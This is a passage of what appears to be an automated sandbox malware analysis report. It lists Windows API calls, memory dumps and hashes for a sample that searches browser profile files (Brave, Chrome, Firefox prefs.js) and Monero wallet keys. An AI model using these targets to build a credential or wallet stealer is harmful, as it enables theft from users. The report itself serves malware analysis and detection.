                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00CAC7BF
                                        • FindClose.KERNEL32(000000FF), ref: 00CAC7D1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                        • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                        • API String ID: 3334442632-726946144
                                        • Opcode ID: 8b1261dba500b06520a028ef619a6f162fb85347833915ff7a30fb929dc74b95
                                        • Instruction ID: 024c3f53a809763003baddd0b46f61885a1afcef14ed88f68237af2f7fc61781
                                        • Opcode Fuzzy Hash: 8b1261dba500b06520a028ef619a6f162fb85347833915ff7a30fb929dc74b95
                                        • Instruction Fuzzy Hash: E8425572910108ABDB14FBB0DD96EED737DAF54300F404568F94AA6181EF34AF49DBA2
                                        APIs
                                        • wsprintfA.USER32 ref: 00CB492C
                                        • FindFirstFileA.KERNEL32(?,?), ref: 00CB4943
                                        • StrCmpCA.SHLWAPI(?,00CC0FDC), ref: 00CB4971
                                        • StrCmpCA.SHLWAPI(?,00CC0FE0), ref: 00CB4987
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00CB4B7D
                                        • FindClose.KERNEL32(000000FF), ref: 00CB4B92
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextwsprintf
                                        • String ID: %s\%s$%s\%s$%s\*
                                        • API String ID: 180737720-445461498
                                        • Opcode ID: 1f606b22b20f4e7602d25e3c1c69d640f1423f91a135863c9f623b5c4a17203f
                                        • Instruction ID: cadbe94404b9bead75d78ee1f977fdb4fecdbae3f86f1386aa82291b66d9fc94
                                        • Opcode Fuzzy Hash: 1f606b22b20f4e7602d25e3c1c69d640f1423f91a135863c9f623b5c4a17203f
                                        • Instruction Fuzzy Hash: 986136B1900219AFCB24EFA1DC89FEA737CBB48700F04459CF549A6141EB75AB89CF91
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00CB4580
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00CB4587
                                        • wsprintfA.USER32 ref: 00CB45A6
                                        • FindFirstFileA.KERNEL32(?,?), ref: 00CB45BD
                                        • StrCmpCA.SHLWAPI(?,00CC0FC4), ref: 00CB45EB
                                        • StrCmpCA.SHLWAPI(?,00CC0FC8), ref: 00CB4601
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00CB468B
                                        • FindClose.KERNEL32(000000FF), ref: 00CB46A0
                                        • lstrcat.KERNEL32(?,009DF2C0), ref: 00CB46C5
                                        • lstrcat.KERNEL32(?,009DD880), ref: 00CB46D8
                                        • lstrlen.KERNEL32(?), ref: 00CB46E5
                                        • lstrlen.KERNEL32(?), ref: 00CB46F6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                        • String ID: %s\%s$%s\*
                                        • API String ID: 671575355-2848263008
                                        • Opcode ID: ce2b54964baeb93194550a20bf0494e7288f78ec1e0fb28145786a8b4009f626
                                        • Instruction ID: 9800ffab1e7475dd94f22c5aa7cdf81fd9c995c47907b6bf0e483cd6ced6b641
                                        • Opcode Fuzzy Hash: ce2b54964baeb93194550a20bf0494e7288f78ec1e0fb28145786a8b4009f626
                                        • Instruction Fuzzy Hash: 215146B590021C9FCB24EBB0DC89FE9777CAB54300F44459DF619A6191EB74AB88CF92
                                        APIs
                                        • wsprintfA.USER32 ref: 00CB3EC3
                                        • FindFirstFileA.KERNEL32(?,?), ref: 00CB3EDA
                                        • StrCmpCA.SHLWAPI(?,00CC0FAC), ref: 00CB3F08
                                        • StrCmpCA.SHLWAPI(?,00CC0FB0), ref: 00CB3F1E
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00CB406C
                                        • FindClose.KERNEL32(000000FF), ref: 00CB4081
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextwsprintf
                                        • String ID: %s\%s
                                        • API String ID: 180737720-4073750446
                                        • Opcode ID: 7affd94b2ea6ac24268a25efaa65319600b6665a0c8632a5d4993b18f692b2be
                                        • Instruction ID: 8fe0c1439db8ed198870def2eaae4282be8cbddcda29fd4db4438aab048248d7
                                        • Opcode Fuzzy Hash: 7affd94b2ea6ac24268a25efaa65319600b6665a0c8632a5d4993b18f692b2be
                                        • Instruction Fuzzy Hash: B15155B6900218AFCB24EBB0DC86EFA737CBB44300F04459DB659A6040DB75EB89CF95
                                        APIs
                                        • wsprintfA.USER32 ref: 00CAED3E
                                        • FindFirstFileA.KERNEL32(?,?), ref: 00CAED55
                                        • StrCmpCA.SHLWAPI(?,00CC1538), ref: 00CAEDAB
                                        • StrCmpCA.SHLWAPI(?,00CC153C), ref: 00CAEDC1
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00CAF2AE
                                        • FindClose.KERNEL32(000000FF), ref: 00CAF2C3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextwsprintf
                                        • String ID: %s\*.*
                                        • API String ID: 180737720-1013718255
                                        • Opcode ID: ff6ef51b79d2ab0244b0285ef3104e46b4927afba5f96896847570e590d1bc3d
                                        • Instruction ID: f92b731cd0e23a6617d3ec42b7d2a62381d5afdf2a95f29ad34d2c58b7d0d697
                                        • Opcode Fuzzy Hash: ff6ef51b79d2ab0244b0285ef3104e46b4927afba5f96896847570e590d1bc3d
                                        • Instruction Fuzzy Hash: C6E1F771911118AAEB64FB61DC92FEE733CAF54300F4041E9B54A62492EF316F8AEF51
                                        APIs
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                          • Part of subcall function 00CBA920: lstrcpy.KERNEL32(00000000,?), ref: 00CBA972
                                          • Part of subcall function 00CBA920: lstrcat.KERNEL32(00000000), ref: 00CBA982
                                          • Part of subcall function 00CBA9B0: lstrlen.KERNEL32(?,009D89A8,?,\Monero\wallet.keys,00CC0E17), ref: 00CBA9C5
                                          • Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
                                          • Part of subcall function 00CBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CBAA12
                                          • Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0E17), ref: 00CBA905
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00CC15B8,00CC0D96), ref: 00CAF71E
                                        • StrCmpCA.SHLWAPI(?,00CC15BC), ref: 00CAF76F
                                        • StrCmpCA.SHLWAPI(?,00CC15C0), ref: 00CAF785
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00CAFAB1
                                        • FindClose.KERNEL32(000000FF), ref: 00CAFAC3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                        • String ID: prefs.js
                                        • API String ID: 3334442632-3783873740
                                        • Opcode ID: 34f8cd16304287fb10f4d08c5336b01a2fc6dcfe5288b991f1ac306869d49c6f
                                        • Instruction ID: 451e42f2764b8bbe597a9bf9edbbaa762ddaadca8f2e54f57a4f3aa013ef99fd
                                        • Opcode Fuzzy Hash: 34f8cd16304287fb10f4d08c5336b01a2fc6dcfe5288b991f1ac306869d49c6f
                                        • Instruction Fuzzy Hash: 70B14271900118ABDB24FF61DC96FEE7379AF55300F4081A8E44AA7191EF316B4ADF92
                                        APIs
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00CC510C,?,?,?,00CC51B4,?,?,00000000,?,00000000), ref: 00CA1923
                                        • StrCmpCA.SHLWAPI(?,00CC525C), ref: 00CA1973
                                        • StrCmpCA.SHLWAPI(?,00CC5304), ref: 00CA1989
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00CA1D40
                                        • DeleteFileA.KERNEL32(00000000), ref: 00CA1DCA
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00CA1E20
                                        • FindClose.KERNEL32(000000FF), ref: 00CA1E32
                                          • Part of subcall function 00CBA920: lstrcpy.KERNEL32(00000000,?), ref: 00CBA972
                                          • Part of subcall function 00CBA920: lstrcat.KERNEL32(00000000), ref: 00CBA982
                                          • Part of subcall function 00CBA9B0: lstrlen.KERNEL32(?,009D89A8,?,\Monero\wallet.keys,00CC0E17), ref: 00CBA9C5
                                          • Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
                                          • Part of subcall function 00CBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CBAA12
                                          • Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0E17), ref: 00CBA905
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                        • String ID: \*.*
                                        • API String ID: 1415058207-1173974218
                                        • Opcode ID: dda21f60d416a766c102de3e7d4ff853206a741eb42b482bc70a1c846bdd1a43
                                        • Instruction ID: ee8d7627231faf0313a450f81e74b826b4fdcede22142a6ab1e1ace2f6fec9dd
                                        • Opcode Fuzzy Hash: dda21f60d416a766c102de3e7d4ff853206a741eb42b482bc70a1c846bdd1a43
                                        • Instruction Fuzzy Hash: DF12F271910118ABDB25FB60CCA6EEE737CAF54300F4041A9B54A664D1EF316F89EFA1
                                        APIs
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                          • Part of subcall function 00CBA9B0: lstrlen.KERNEL32(?,009D89A8,?,\Monero\wallet.keys,00CC0E17), ref: 00CBA9C5
                                          • Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
                                          • Part of subcall function 00CBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CBAA12
                                          • Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0E17), ref: 00CBA905
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00CC0C2E), ref: 00CADE5E
                                        • StrCmpCA.SHLWAPI(?,00CC14C8), ref: 00CADEAE
                                        • StrCmpCA.SHLWAPI(?,00CC14CC), ref: 00CADEC4
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00CAE3E0
                                        • FindClose.KERNEL32(000000FF), ref: 00CAE3F2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                        • String ID: \*.*
                                        • API String ID: 2325840235-1173974218
                                        • Opcode ID: 1d2d8eb7c226b733929eaad533dc2d6004556c1f2096ae5bd0b1aec588153734
                                        • Instruction ID: 29dc596a114e9e2bec6e5b0eaf7ea6a4db9a32eda9bd1c06778f734d74fecc11
                                        • Opcode Fuzzy Hash: 1d2d8eb7c226b733929eaad533dc2d6004556c1f2096ae5bd0b1aec588153734
                                        • Instruction Fuzzy Hash: 01F1A371814118AADB25FB61DCA5EEE733CBF54300F8041E9B45A62491EF316F4ADF61
                                        APIs
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                          • Part of subcall function 00CBA920: lstrcpy.KERNEL32(00000000,?), ref: 00CBA972
                                          • Part of subcall function 00CBA920: lstrcat.KERNEL32(00000000), ref: 00CBA982
                                          • Part of subcall function 00CBA9B0: lstrlen.KERNEL32(?,009D89A8,?,\Monero\wallet.keys,00CC0E17), ref: 00CBA9C5
                                          • Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
                                          • Part of subcall function 00CBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CBAA12
                                          • Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0E17), ref: 00CBA905
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00CC14B0,00CC0C2A), ref: 00CADAEB
                                        • StrCmpCA.SHLWAPI(?,00CC14B4), ref: 00CADB33
                                        • StrCmpCA.SHLWAPI(?,00CC14B8), ref: 00CADB49
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00CADDCC
                                        • FindClose.KERNEL32(000000FF), ref: 00CADDDE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                        • String ID:
                                        • API String ID: 3334442632-0
                                        • Opcode ID: 3dac70f8072790d8363dbe3b7611d2ca8ad972dc008ad937f6e7b6bd72745630
                                        • Instruction ID: fab5cf51aced5a615871ff8d0040897fad3f46c784fffeb5f650c1b0e0e7e70d
                                        • Opcode Fuzzy Hash: 3dac70f8072790d8363dbe3b7611d2ca8ad972dc008ad937f6e7b6bd72745630
                                        • Instruction Fuzzy Hash: D7915972900108ABCB14FFB1DC96DED737DAB85304F408568F85BA6581EE34AB0DDB92
                                        APIs
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                        • GetKeyboardLayoutList.USER32(00000000,00000000,00CC05AF), ref: 00CB7BE1
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00CB7BF9
                                        • GetKeyboardLayoutList.USER32(?,00000000), ref: 00CB7C0D
                                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00CB7C62
                                        • LocalFree.KERNEL32(00000000), ref: 00CB7D22
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
